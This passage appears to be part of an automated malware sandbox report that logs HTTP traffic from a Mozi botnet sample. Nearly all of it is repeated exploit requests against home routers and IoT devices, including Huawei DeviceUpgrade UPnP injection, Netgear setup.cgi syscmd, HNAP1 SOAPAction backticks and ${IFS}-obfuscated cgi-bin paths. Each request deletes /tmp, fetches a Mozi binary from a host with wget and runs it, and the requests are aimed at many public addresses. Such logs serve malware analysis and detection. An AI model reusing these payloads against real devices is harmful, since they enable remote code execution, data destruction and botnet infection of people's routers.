xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 95.187.185.8:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 117.232.214.7:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 171.233.96.107:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 143.74.5.76:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 187.66.208.9:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.38.229.239:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 17.151.75.62:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 198.157.1.165:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
